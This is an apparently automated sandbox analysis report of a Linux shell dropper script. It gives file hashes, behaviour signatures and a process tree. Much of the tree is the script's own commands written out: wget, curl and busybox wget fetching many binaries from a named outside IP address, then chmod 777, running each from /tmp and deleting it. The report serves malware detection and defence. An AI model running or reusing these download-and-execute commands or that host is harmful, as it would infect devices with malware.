Analysis
-
max time kernel
52s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
14-11-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
-
Size
10KB
-
MD5
aae1d5abee7934f0e4222cffef0b2329
-
SHA1
068230ae72391a90d17b4f8c26d9665b3c7971be
-
SHA256
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d
-
SHA512
1e9c830304e2aded2bd79e88b10a4af93cc50ac5e1b627a042727a17d92546e521a2d20b99af77a18a60d8cef82498eb9295bc3d340fc76b38930b6e5356fc2b
-
SSDEEP
192:qovj7zA0N1Bx6yhxSWD8M8FBSSGgAap+mX4DGgAap+mXmDV8M8FBSHFj7zA031Bg:qovj7zA0VxV5SWZDWVDzlj7zA0c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh1⤵PID:1505
-
/bin/rm/bin/rm bins.sh2⤵PID:1506
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1507
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1513
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1516
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1519
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1522
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1525
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1528
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1529
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1531
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1534
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1537
-
-
/bin/chmodchmod 777 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA./O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1540
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1543
-
-
/bin/chmodchmod 777 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof./YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1546
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1549
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1552
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1553
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1555
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1558
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1561
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1564
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1567
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1570
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1573
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1576
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1579
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1582
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1585
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1588
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1591
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1594
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1597
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1600
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1603
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1606
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1609
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1612
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1615
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1618
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1621
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1624
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1627
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1630
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1633
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1636
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1637
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1639
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1642
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1645
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1648
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1651
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1654
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1657
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1663
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1665
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1668
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1669
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1671
-
-
/bin/chmodchmod 777 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA./O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Executes dropped EXE
PID:1673
-
-
/bin/rmrm O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1674
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1675
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Writes file to tmp directory
PID:1676
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1677
-
-
/bin/chmodchmod 777 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof./YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Executes dropped EXE
PID:1679
-
-
/bin/rmrm YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1680
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97